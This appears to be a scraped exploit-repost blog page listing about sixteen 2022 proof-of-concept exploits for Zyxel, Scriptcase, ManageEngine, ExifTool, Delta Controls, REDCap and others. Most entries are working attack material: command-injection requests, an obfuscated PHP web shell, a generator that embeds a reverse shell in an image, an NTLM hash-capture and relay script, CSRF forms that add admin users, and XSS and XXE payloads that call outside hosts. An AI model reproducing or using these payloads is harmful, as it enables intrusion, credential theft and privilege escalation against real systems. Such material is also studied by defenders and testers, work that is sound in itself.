Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863130505

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
# Exploit Title: Zyxel NWA-1100-NH - Command Injection
# Date: 12/4/2022
# Exploit Author: Ahmed Alroky
# Vendor Homepage: https://www.zyxel.com/homepage.shtml
# Version: ALL BEFORE 2.12
# Tested on: Linux
# CVE : CVE-2021-4039
# References : https://download.zyxel.com/NWA1100-NH/firmware/NWA1100-NH_2.12(AASI.3)C0_2.pdf , 
https://www.zyxel.com/support/OS-command-injection-vulnerability-of-NWA1100-NH-access-point.shtml


HTTP Request :

POST /login/login.html HTTP/1.1
Host: IP_address:8081
Content-Length: 80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http:/IP_address:8081
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://IP_address:8081/login/login.html
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

myname=ffUfRAgO%60id%7ctelnet%20yourserverhere%2021%60&mypasswd=test&Submit=Login
HireHackking 
# Exploit Title: Scriptcasr 9.7 arbitrary file upload getshell
# Date: 2022-04-08
# Exploit Author: luckyt0mat0
# Vendor Homepage:  https://www.scriptcase.net/
# Software Link: https://www.scriptcase.net/download/
# Version: 9.7
# Tested on: Windows Server 2019

# Proof of Concept:

POST /scriptcase/devel/lib/third/jquery_plugin/jQuery-File-Upload/server/php/ HTTP/1.1
Host: 10.50.1.214:8091
Content-Length: 570
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Origin: http://10.50.1.214:8091
Referer: http://10.50.1.214:8091/scriptcase/devel/iface/app_template.php?randjs=MYxlp4xwCiIQBjy
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: sales1.scriptcase-_zldp=%2Blf8JBkbzCTGvnrypkRAEoy1%2BVW%2BpJL8Vv42yN%2FS02hog7eXhi2oz9sY2rJ5JXybCaUbPUvRWVc%3D; sales1.scriptcase-_zldt=6206f2cd-57fd-4e1d-99a8-b9a27c7b3421-2; PHPSESSID=be1281e8cde9348d284c3074c9bea53e; sc_actual_lang_samples=en_us
Connection: close

------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="jqul_csrf_token"

gZiFUw6nNw84D4euS8RJ3AQLz0o3Bo1Q24Kq1ufcJA8FjRCIeohe0gBZ34hXIW7M
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ
Content-Disposition: form-data; name="files[]"; filename="123.php"
Content-Type: text/html

<?php
error_reporting(0);
$a = rad2deg^(3).(2);
$b = asin^(2).(6);
$c = ceil^(1).(1);
$exp = $a.$b.$c; //assert
$pi=(is_nan^(6).(4)).(tan^(1).(5)); //_GET
$pi=$$pi; //$_GET
call_user_func($exp,$pi{0}($pi{1}));
?>
------WebKitFormBoundary6gbgDzCQ2aZWm6iZ———

# Notes:
- PHPSESSID is  - be1281e8cde9348d284c3074c9bea53e
- Upload path is - http://x.x.x.:8091/scriptcase/tmp/sc_tmp_upload_{{PHPSESSID}}/123.php
HireHackking 
Exploit Title: Verizon 4G LTE Network Extender - Weak Credentials Algorithm
Exploit Author: LiquidWorm


Vendor: Verizon Communications Inc.
Product web page: https://www.verizon.com
Affected version: GA4.38 - V0.4.038.2131

Summary: An LTE Network Extender enhances your indoor and 4G
LTE data and voice coverage to provide better service for your
4G LTE mobile devices. It's an extension of our 4G LTE network
that's placed directly in your home or office. The LTE Network
Extender works with all Verizon-sold 4G LTE mobile devices for
4G LTE data service and HD Voice-capable 4G LTE devices for voice
service. This easy-to-install device operates like a miniature
cell tower that plugs into your existing high-speed broadband
connection to communicate with the Verizon wireless network.

Desc: Verizon's 4G LTE Network Extender is utilising a weak
default admin password generation algorithm. The password is
generated using the last 4 values from device's MAC address
which is disclosed on the main webUI login page to an unauthenticated
attacker. The values are then concatenated with the string
'LTEFemto' resulting in something like 'LTEFemtoD080' as the
default Admin password.

Tested on: lighttpd-web


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5701
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5701.php


17.02.2022

--


snippet:///Exploit
//
// Verizon 4G LTE Network Extender Super Awesome JS Exploit
//

console.log("Calling 'isDefaultPassword' API");
let req = new Request("/webapi/isDefaultPassword");
let def = req.url;

const doAjax = async () => {
  const resp = await fetch(def);
  if (resp.ok) {
    const jsonyo = await resp.json();
    return Promise.resolve(jsonyo);
  } else {
    return Promise.reject("Smth not rite captain!");
  }
}
doAjax().then(console.log).catch(console.log);

await new Promise(t => setTimeout(t, 1337));

console.log("Verizon Admin Password: ");
let mac = document.querySelector("#mac_address").innerHTML;
console.log("LTEFemto" + mac.substr(-4));
HireHackking 
# Exploit Title: WordPress Plugin Videos sync PDF 1.7.4 - Stored Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/video-synchro-pdf/
# Date: 2022-04-13
# Exploit Author: UnD3sc0n0c1d0
# Vendor Homepage: http://www.a-j-evolution.com/
# Software Link: https://downloads.wordpress.org/plugin/video-synchro-pdf.1.7.4.zip
# Category: Web Application
# Version: 1.7.4
# Tested on: CentOS / WordPress 5.9.3
# CVE : N/A

# 1. Technical Description:
The plugin does not properly sanitize the nom, pdf, mp4, webm and ogg parameters, allowing 
potentially dangerous characters to be inserted. This includes the reported payload, which 
triggers a persistent Cross-Site Scripting (XSS).
  
# 2. Proof of Concept (PoC):
 a. Install and activate version 1.7.4 of the plugin.
 b. Go to the plugin options panel (http://[TARGET]/wp-admin/admin.php?page=aje_videosyncropdf_videos).
 c. Open the "Video example" or create a new one (whichever you prefer).
 d. Change or add in some of the displayed fields (Name, PDF file, MP4 video, WebM video or OGG video) 
	the following payload:
		" autofocus onfocus=alert(/XSS/)>.
 e. Save the changes. "Edit" button.
 f. JavaScript will be executed and a popup with the text "XSS" will be displayed.

Note: This change will be permanent until you modify the edited field.
HireHackking

ManageEngine ADSelfService Plus 6.1 - User Enumeration

HACKER · %s · %s

# Exploit Title: ManageEngine ADSelfService Plus 6.1 - User Enumeration # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Version: ADSelfService 6.1 Build 6121 # Tested Against: Build 6118 - 6121 # Details: https://github.com/passtheticket/vulnerability-research/blob/main/manage-engine-apps/adselfservice-userenum.md # !/usr/bin/python3 import requests import sys import time import urllib3 from urllib3.exceptions import InsecureRequestWarning """ The domain users can be enumerated like userenum module of the kerbrute tool using this exploit. If you conducted a brute-force attack against a user, please run the script after 30 minutes (default settings) otherwise the results can be false positive. """ def request(target, user): urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) url = target + 'ServletAPI/accounts/login' data = {"loginName": user} headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = requests.post(url, data=data, headers=headers, verify=False) # For debugging # print("[*] Response for " + user + ": " + req.text.strip()) if 'PASSWORD' in req.text: print("[+] " + user + " is VALID!") elif 'Your account has been disabled' in req.text: print("[+] " + user + " account has been DISABLED.") elif 'Your account has expired' in req.text: print("[+] " + user + " account has EXPIRED.") elif 'Enter the text as shown in the image.' in req.text: print("[!] The exploit doesn't detect expired and disabled users. Please, run it after the 30 minutes. ") elif 'Permission Denied.' in req.text: print("[-] " + user + " is not found.") def get_users(target, file): try: file = open(file, "r") for line in file: line = line.strip() time.sleep(0.5) request(target, user=line) except FileNotFoundError: print("[-] File not found!") sys.exit(1) def main(args): if len(args) != 3: print("[*] Usage: %s url usernames_file" % (args[0])) print("[*] Example: %s https://target/ /tmp/usernames.txt" % (args[0])) sys.exit(1) get_users(target=args[1], file=args[2]) if __name__ == "__main__": main(args=sys.argv)
HireHackking
# Exploit Title: WordPress Plugin Popup Maker <1.16.5 - Persistent Cross-Site Scripting (Authenticated) # Date: 2022-03-03 # Exploit Author: Roel van Beurden # Vendor Homepage: https://wppopupmaker.com # Software Link: https://downloads.wordpress.org/plugin/popup-maker.1.16.4.zip # Version: <1.16.5 # Tested on: WordPress 5.9 on Ubuntu 20.04 1. Description: ---------------------- WordPress Plugin Popup Maker <1.16.5 does not sanitise and escape some of its popup settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed. 2. Proof of Concept: ---------------------- Create Popup > Popup Settings > Triggers > Add New Cookie > Add > Cookie Time (overwrite the default '1 month' with XSS payload) Click 'Add' what triggers the XSS payload Payload examples: <script>alert('XSS');</script> <img src=x onerror=alert('XSS')>
HireHackking
# Exploit Tile: Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Request Forgery (CSRF) # Exploit Author: LiquidWorm <!DOCTYPE html> <html> <head><title>enteliTouch CSRF</title></head> <body> <!-- Delta Controls enteliTOUCH 3.40.3935 Cross-Site Request Forgery (CSRF) Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application interface allows users to perform certain actions via HTTP requests without performing any validity checks to verify the requests. This can be exploited to perform certain actions with administrative privileges if a logged-in user visits a malicious web site. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5702 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5702.php 06.04.2022 --> CSRF Add User: <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Add&userName=&userPassword=" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="zsl" /> <input type="hidden" name="Password" value="123t00t" /> <input type="hidden" name="AutoLogout" value="17" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="FIL28" /> <input type="hidden" name="ObjRef" value="" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Add" /> <input type="submit" value="Go for UserAdd" /> </form> <br /> CSRF Change Admin Password (default: delta:login): <form action="http://192.168.0.210/deltaweb/hmi_useredit.asp?formAction=Edit&userName=DELTA&userPassword=baaah" method="POST"> <input type="hidden" name="actionName" value="" /> <input type="hidden" name="Username" value="DELTA" /> <input type="hidden" name="Password" value="123456" /> <input type="hidden" name="AutoLogout" value="30" /> <input type="hidden" name="SS&#95;SelectedOptionId" value="" /> <input type="hidden" name="ObjRef" value="ZSL-251" /> <input type="hidden" name="Apply" value="true" /> <input type="hidden" name="formAction" value="Edit" /> <input type="submit" value="Go for UserEdit" /> </form> </body> </html>
HireHackking
Exploit Title: Delta Controls enteliTOUCH 3.40.3935 - Cookie User Password Disclosure Exploit Author: LiquidWorm Vendor: Delta Controls Inc. Product web page: https://www.deltacontrols.com Affected version: 3.40.3935 3.40.3706 3.33.4005 Summary: enteliTOUCH - Touchscreen Building Controller. Get instant access to the heart of your BAS. The enteliTOUCH has a 7-inch, high-resolution display that serves as an interface to your building. Use it as your primary interface for smaller facilities or as an on-the-spot access point for larger systems. The intuitive, easy-to-navigate interface gives instant access to manage your BAS. Desc: The application suffers from a cleartext transmission/storage of sensitive information in a Cookie. This allows a remote attacker to intercept the HTTP Cookie authentication credentials through a man-in-the-middle attack. Tested on: DELTA enteliTOUCH Vulnerability discovered by Gjoko 'LiquidWorm' Krstic @zeroscience Advisory ID: ZSL-2022-5704 Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5704.php 06.04.2022 -- GET /deltaweb/hmi_useredit.asp?ObjRef=BAC.1000.ZSL3&formAction=Edit HTTP/1.1 Host: 192.168.0.210 Cache-Control: max-age=0 User-Agent: Toucher/1.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.0.210/deltaweb/hmi_userconfig.asp Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: Previous=; lastLoaded=; LastUser=DELTA; LogoutTime=10; UserInstance=1; UserName=DELTA; Password=LOGIN; LastGraphic=; LastObjRef=; AccessKey=DADGGEOFNILEJMBBCNDKFNJPHPPJDAEDGEBJACPEAPBHDCGPCAGNNDEOJIJEOPPLOEKCFMAFNHDJPHGACMDFMPFDNONPIJAHBBNAAIDMDHCCPMAJDELDNLOPBPDCKELJADDKICPMMPCNEOMBHMKIIBJHFAJKNKJFGDEOLPMGMNBEHFLNEDIFMJKMCJKBHPGGEMHJJGMOMAECDKDIIKGNDDGANIHDKPNACLMANGJAOBDNJCFGEIHIJICLPGOFFMDOOLOJCJPAPPKOJFCKFAHDDAGNLCAHKKKGHCBODHBNDCOECGHG Connection: close
HireHackking

SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE)

HACKER · %s · %s

# Exploit Title: SAP BusinessObjects Intelligence 4.3 - XML External Entity (XXE) # Google Dork: N/A # Date: 4/21/2022 # Exploit Author: West Shepherd # Vendor Homepage: https://www.sap.com/ # Software Link: https://www.sap.com/ # Version: 4.2 and 4.3 # Tested on: Windows Server 2019 x64 # CVE : CVE-2022-28213 # References: https://github.com/wshepherd0010/advisories/blob/master/CVE-2022-28213.md curl -sk -X POST -H 'Content-Type: application/xml;charset=UTF-8' \ --data '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "\\attackerwebsite.com\XXE\example">%remote;%int;%trick;]>' \ https://example.com/biprws/logon/long
HireHackking

TCQ - ITeCProteccioAppServer.exe - Unquoted Service Path

HACKER · %s · %s

# Exploit Title: TCQ - 'ITeCProteccioAppServer.exe' Unquoted Service Path # Discovery by: Edgar Carrillo Egea - https://twitter.com/ecarrilloeg # Discovery Date: 2022-04-25 # Vendor Homepage: https://itec.es/programas/ # Vulnerability Type: Unquoted Service Path Privilege Escalation # Tested on OS: Microsoft Windows 11 Home To properly exploit this vulnerability, the local attacker must insert an executable file in the path of the service. Upon service restart or system reboot, the malicious code will be run with elevated privileges. C:\Users\edgar>sc qc "ITeCProteccioAppServer" [SC] QueryServiceConfig CORRECTO NOMBRE_SERVICIO: ITeCProteccioAppServer TIPO : 110 WIN32_OWN_PROCESS (interactive) TIPO_INICIO : 2 AUTO_START CONTROL_ERROR : 1 NORMAL NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\ITeC\LIC\ITeCProteccioAppServer.exe GRUPO_ORDEN_CARGA : ETIQUETA : 0 NOMBRE_MOSTRAR : ITeCProteccioAppServer DEPENDENCIAS : RPCSS NOMBRE_INICIO_SERVICIO: LocalSystem C:\Users\edgar>systeminfo Nombre de host: DESKTOP-0DL5SID Nombre del sistema operativo: Microsoft Windows 11 Home Versión del sistema operativo: 10.0.22000 N/D Compilación 22000
HireHackking

ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure

HACKER · %s · %s

# Exploit Title: ManageEngine ADSelfService Plus Build 6118 - NTLMv2 Hash Exposure # Exploit Author: Metin Yunus Kandemir # Vendor Homepage: https://www.manageengine.com/ # Software Link: https://www.manageengine.com/products/self-service-password/download.html # Details: https://docs.unsafe-inline.com/0day/multiple-manageengine-applications-critical-information-disclosure-vulnerability # Version: ADSelfService Plus Build < 6121 # Tested against: Build 6118 # CVE: CVE-2022-29457 # !/usr/bin/python3 import argparse import requests import urllib3 import random import sys """ 1- a)Set up SMB server to capture NTMLv2 hash. python3 smbserver.py share . -smb2support b)For relaying to SMB: python3 ntlmrelayx.py -smb2support -t smb://TARGET c)For relaying to LDAP: python3 ntlmrelayx.py -t ldaps://TARGET 2- Fire up the exploit. You will obtain the NTLMv2 hash of user/computer account that runs the ADSelfService in five minutes. """ urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) def get_args(): parser = argparse.ArgumentParser( epilog="Example: exploit.py -t https://Target/ -l Listener-IP -a adselfservice -d unsafe.local -u operator1 -p operator1") parser.add_argument('-d', '--domain', required=True, action='store', help='DNS name of the target domain. ') parser.add_argument('-a', '--auth', required=True, action='store', help='If you have credentials of the application user, type adselfservice. If you have credentials of the domain user, type domain') parser.add_argument('-u', '--user', required=True, action='store') parser.add_argument('-p', '--password', required=True, action='store') parser.add_argument('-t', '--target', required=True, action='store', help='Target url') parser.add_argument('-l', '--listener', required=True, action='store', help='Listener IP to capture NTLMv2 hash') args = parser.parse_args() return args def scheduler(domain, auth, target, listener, user, password): try: with requests.Session() as s: gUrl = target getCsrf = s.get(url=gUrl, allow_redirects=False, verify=False) csrf = getCsrf.cookies['_zcsr_tmp'] print("[*] Csrf token: %s" % getCsrf.cookies['_zcsr_tmp']) if auth.lower() == 'adselfservice': auth = "ADSelfService Plus Authentication" data = { "loginName": user, "domainName": auth, "j_username": user, "j_password": password, "AUTHRULE_NAME": "ADAuthenticator", "adscsrf": [csrf, csrf] } #Login url = target + "j_security_check" headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0"} req = s.post(url, data=data, headers=headers, allow_redirects=True, verify=False) #Auth Check url2 = target + "webclient/index.html" req2 = s.get(url2, headers=headers, allow_redirects=False, verify=False) if req2.status_code == 200: print("[+] Authentication is successful.") elif req2.status_code == 302: print("[-] Login failed.") sys.exit(1) else: print("[-] Something went wrong") sys.exit(1) dn = domain.split(".") r1 = random.randint(1, 1000) surl = target + 'ServletAPI/Reports/saveReportScheduler' data = { 'SCHEDULE_ID':'0', 'ADMIN_STATUS':'3', 'SCHEDULE_NAME': 'enrollment' + str(r1), 'DOMAINS': '["'+ domain +'"]', 'DOMAIN_PROPS': '{"'+ domain +'":{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","DOMAIN_SELECTED_OUS_GROUPS":{"ou":[{"OBJECT_GUID":"{*}","DISTINGUISHED_NAME":"DC='+ dn[0] +',DC='+ dn[1] +'","NAME":"'+ domain +'"}]}}}', 'SELECTED_REPORTS': '104,105', 'SELECTED_REPORT_LIST': '[{"REPORT_CATEGORY_ID":"3","REPORT_LIST":[{"CATEGORY_ID":"3","REPORT_NAME":"adssp.reports.enroll_rep.enroll.heading","IS_EDIT":false,"SCHEDULE_ELEMENTS":[],"REPORT_ID":"104"},{"CATEGORY_ID":"3","REPORT_NAME":"adssp.common.text.non_enrolled_users","IS_EDIT":true,"SCHEDULE_ELEMENTS":[{"DEFAULT_VALUE":false,"size":"1","ELEMENT_VALUE":false,"uiText":"adssp_reports_enroll_rep_non_enroll_show_notified","name":"SHOW_NOTIFIED","id":"SHOW_NOTIFIED","TYPE":"checkbox","class":"grayfont fntFamily fntSize"}],"REPORT_ID":"105"}],"REPORT_CATEGORY_NAME":"adssp.xml.reportscategory.enrollment_reports"}]', 'SCHEDULE_TYPE': 'hourly', 'TIME_OF_DAY': '0', 'MINS_OF_HOUR': '5', 'EMAIL_ID': user +'@'+ domain, 'NOTIFY_ADMIN': 'true', 'NOTIFY_MANAGER': 'false', 'STORAGE_PATH': '\\\\' + listener + '\\share', 'FILE_FORMAT': 'HTML', 'ATTACHMENT_TYPE': 'FILE', 'ADMIN_MAIL_PRIORITY': 'Medium', 'ADMIN_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_sub', 'ADMIN_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_msg_html', 'MANAGER_FILE_FORMAT': 'HTML', 'MANAGER_ATTACHMENT_TYPE': 'FILE', 'MANAGER_MAIL_SUBJECT': 'adssp.reports.schedule_reports.mail_settings_mgr_sub', 'MANAGER_MAIL_CONTENT': 'adssp.reports.schedule_reports.mail_settings_mgr_msg_html', 'adscsrf': csrf } sch = s.post(surl, data=data, headers=headers, allow_redirects=False, verify=False) if 'adssp.reports.schedule_reports.storage_path.unc_storage_path' in sch.text: print('[-] The target is patched!') sys.exit(1) if sch.status_code == 200: print("[+] The report is scheduled. The NTLMv2 hash will be captured in five minutes!") else: print("[-] Something went wrong. Please, try it manually!") sys.exit(1) except: print('[-] Connection error!') def main(): arg = get_args() domain = arg.domain auth = arg.auth user = arg.user password = arg.password target = arg.target listener = arg.listener scheduler(domain, auth, target, listener, user, password) if __name__ == "__main__": main()
HireHackking

DLINK DIR850 - Insecure Access Control

HACKER · %s · %s

# Exploit Title: DLINK DIR850 - Insecure Access Control # Product: Dlink # Model: DIR850 # Date: 14/1/2022 # CVE : CVE-2021-46378 # Exploit Author: Ahmed Alroky # Hardware version: b1 # Firmware version: ET850-1.08TRb03 # Vendor home page: https://www.dlink.com/ # Exploit : Visit http://<IP Address>/config.dat
HireHackking

Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: Cyclos 4.14.7 - 'groupId' DOM Based Cross-Site Scripting (XSS) # Date: 17/04/2021 # Exploit Author: Tin Pham aka TF1T of VietSunshine Cyber Security Services # Vendor Homepage: https://www.cyclos.org/ # Version: Cyclos 4.14.7 (and prior) # Tested on: Ubuntu # CVE : CVE-2021-31673 # Description: A Dom-based Cross-site scripting (XSS) vulnerability at registration account in Cyclos 4 PRO.14.7 and prior allows remote attackers to inject arbitrary web script or HTML via the 'groupId' parameter. # Steps to reproduce: An attacker sends a draft URL [IP]/#users.users.public-registration!groupId=1%27%22%3E%3Cimg%20src=x%20onerror=alert(document.domain)%3E to victim. When a victim opens the URL, XSS will be triggered.
HireHackking

ExifTool 12.23 - Arbitrary Code Execution

HACKER · %s · %s

# Exploit Title: ExifTool 12.23 - Arbitrary Code Execution # Date: 04/30/2022 # Exploit Author: UNICORD (NicPWNs & Dev-Yeoj) # Vendor Homepage: https://exiftool.org/ # Software Link: https://github.com/exiftool/exiftool/archive/refs/tags/12.23.zip # Version: 7.44-12.23 # Tested on: ExifTool 12.23 (Debian) # CVE: CVE-2021-22204 # Source: https://github.com/UNICORDev/exploit-CVE-2021-22204 # Description: Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image #!/usr/bin/env python3 # Imports import base64 import os import subprocess import sys # Class for colors class color: red = '\033[91m' gold = '\033[93m' blue = '\033[36m' green = '\033[92m' no = '\033[0m' # Print UNICORD ASCII Art def UNICORD_ASCII(): print(rf""" {color.red} _ __,~~~{color.gold}/{color.red}_{color.no} {color.blue}__ ___ _______________ ___ ___{color.no} {color.red} ,~~`( )_( )-\| {color.blue}/ / / / |/ / _/ ___/ __ \/ _ \/ _ \{color.no} {color.red} |/| `--. {color.blue}/ /_/ / // // /__/ /_/ / , _/ // /{color.no} {color.green}_V__v___{color.red}!{color.green}_{color.red}!{color.green}__{color.red}!{color.green}_____V____{color.blue}\____/_/|_/___/\___/\____/_/|_/____/{color.green}....{color.no} """) # Print exploit help menu def help(): print(r"""UNICORD Exploit for CVE-2021-22204 Usage: python3 exploit-CVE-2021-22204.py -c <command> python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> python3 exploit-CVE-2021-22204.py -c <command> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -s <local-IP> <local-port> [-i <image.jpg>] python3 exploit-CVE-2021-22204.py -h Options: -c Custom command mode. Provide command to execute. -s Reverse shell mode. Provide local IP and port. -i Path to custom JPEG image. (Optional) -h Show this help menu. """) # Run the exploit def exploit(command): UNICORD_ASCII() # Create perl payload payload = "(metadata \"\c${" payload += command payload += "};\")" print(f"{color.red}RUNNING: {color.blue}UNICORD Exploit for CVE-2021-22204{color.no}") print(f"{color.red}PAYLOAD: {color.gold}" + payload + f"{color.no}") # Write payload to file payloadFile = open('payload','w') payloadFile.write(payload) payloadFile.close() # Bzz compress file subprocess.run(['bzz', 'payload', 'payload.bzz']) # Run djvumake subprocess.run(['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz']) if '-i' in sys.argv: imagePath = sys.argv[sys.argv.index('-i') + 1] subprocess.run(['cp',f'{imagePath}','./image.jpg','-n']) else: # Smallest possible JPEG image = b"/9j/4AAQSkZJRgABAQEASABIAAD/2wBDAAMCAgICAgMCAgIDAwMDBAYEBAQEBAgGBgUGCQgKCgkICQkKDA8MCgsOCwkJDRENDg8QEBEQCgwSExIQEw8QEBD/yQALCAABAAEBAREA/8wABgAQEAX/2gAIAQEAAD8A0s8g/9k=" # Write smallest possible JPEG image to file with open("image.jpg", "wb") as img: img.write(base64.decodebytes(image)) # Write exiftool config to file config = (r""" %Image::ExifTool::UserDefined = ( 'Image::ExifTool::Exif::Main' => { 0xc51b => { Name => 'HasselbladExif', Writable => 'string', WriteGroup => 'IFD0', }, }, ); 1; #end """) configFile = open('exiftool.config','w') configFile.write(config) configFile.close() # Exiftool config for output image subprocess.run(['exiftool','-config','exiftool.config','-HasselbladExif<=exploit.djvu','image.jpg','-overwrite_original_in_place','-q']) # Delete leftover files os.remove("payload") os.remove("payload.bzz") os.remove("exploit.djvu") os.remove("exiftool.config") # Print results print(f"{color.red}RUNTIME: {color.green}DONE - Exploit image written to 'image.jpg'{color.no}\n") exit() if __name__ == "__main__": args = ['-h','-c','-s','-i'] if args[0] in sys.argv: help() elif args[1] in sys.argv and not args[2] in sys.argv: exec = sys.argv[sys.argv.index(args[1]) + 1] command = f"system(\'{exec}\')" exploit(command) elif args[2] in sys.argv and not args[1] in sys.argv: localIP = sys.argv[sys.argv.index(args[2]) + 1] localPort = sys.argv[sys.argv.index(args[2]) + 2] command = f"use Socket;socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp'));if(connect(S,sockaddr_in({localPort},inet_aton('{localIP}')))){{open(STDIN,'>&S');open(STDOUT,'>&S');open(STDERR,'>&S');exec('/bin/sh -i');}};" exploit(command) else: help()
HireHackking

PKP Open Journals System 3.3 - Cross-Site Scripting (XSS)

HACKER · %s · %s

# Exploit Title: PKP Open Journals System 3.3 - Cross-Site Scripting (XSS) # Date: 31/01/2022 # Exploit Author: Hemant Kashyap # Vendor Homepage: https://github.com/pkp/pkp-lib/issues/7649 # Version: PKP Open Journals System 2.4.8 >= 3.3 # Tested on: All OS # CVE : CVE-2022-24181 # References: https://youtu.be/v8-9evO2oVg XSS via Host Header injection and Steal Password Reset Token of another user Step to reproduce: 1) Go to this site: https://who's-using-ojs-software.com 2) And capture this request in burp , and send to repeater. 3) Add this after Host Header X-Forwarded-Host: foo"><script src=//dtf.pw/2.js></script><x=".com 4) And this click on send , after this right click on request and click on show response in browser , after this copy the request. 5) Paste this request in browser , and you'll see xss pop-up. Mitigation: Update to newer version. This vulnerability in PKP vendor software Open-journal-system version 2.4.8 to 3.3.8 all are vulnerable to xss via Host Header injection and steal password reset token vulnerability
HireHackking

REDCap 11.3.9 - Stored Cross Site Scripting

HACKER · %s · %s

# Exploit Title: REDCap 11.3.9 - Stored Cross-Site Scripting # Date: 2021-10-11 # Exploit Author: Kendrick Lam # References: https://github.com/KCL04/XSS-PoCs/blob/main/CVE-2021-42136.js # Vendor Homepage: https://projectredcap.org # Software Link: https://projectredcap.org # Version: Redcap before 11.4.0 # Tested on: 11.2.5 # CVE: CVE-2021-42136 # Security advisory: https://redcap.med.usc.edu/_shib/assets/ChangeLog_Standard.pdf ### Stored XSS – Missing Data Code Value (found by Kendrick Lam) It was possible to store JavaScript as values for Missing Data Codes. - Where: Missing Data Code. - Payload: <script> var target = document.location.host; var csrf_token = csrf_token; var userId = '<userId>'; // Replace with your user ID. function privesc() { var xhr = new XMLHttpRequest(); xhr.open("POST", "https://" + target + "/index.php?route=ControlCenterController:saveNewAdminPriv", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.setRequestHeader("Sec-Fetch-Dest", "empty"); xhr.withCredentials = "true"; var body = ""; body += "userid=" + userId + "&attrs=admin_rights%2Csuper_user%2Caccount_manager%2Caccess_system_config%2Caccess_system_upgrade%2Caccess_external_module_install%2Caccess_admin_dashboards&csrf_token=" + csrf_token; xhr.send(body); return true; } privesc(); </script> - Details: The payload will escalate a regular user's privileges, if viewed by an account with permission to change privileges (such as an administrator). - Privileges: Low privileged / regular user - Location example: https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX - Privileges: + Store: Low privileged user is able to store Missing Data Code values. + Execute: Any authenticated user. The payload will trigger once the page loads, this means storing the payload and sending over the link to an administrator would be able to escalate the user's privileges. For example, by browsing to https://redcap.XXX/redcap/redcap_vv11.2.5/Design/data_dictionary_codebook.php?pid=XX
HireHackking

Delta Controls enteliTOUCH 3.40.3935 - Cross-Site Scripting (XSS)

HACKER · %s · %s

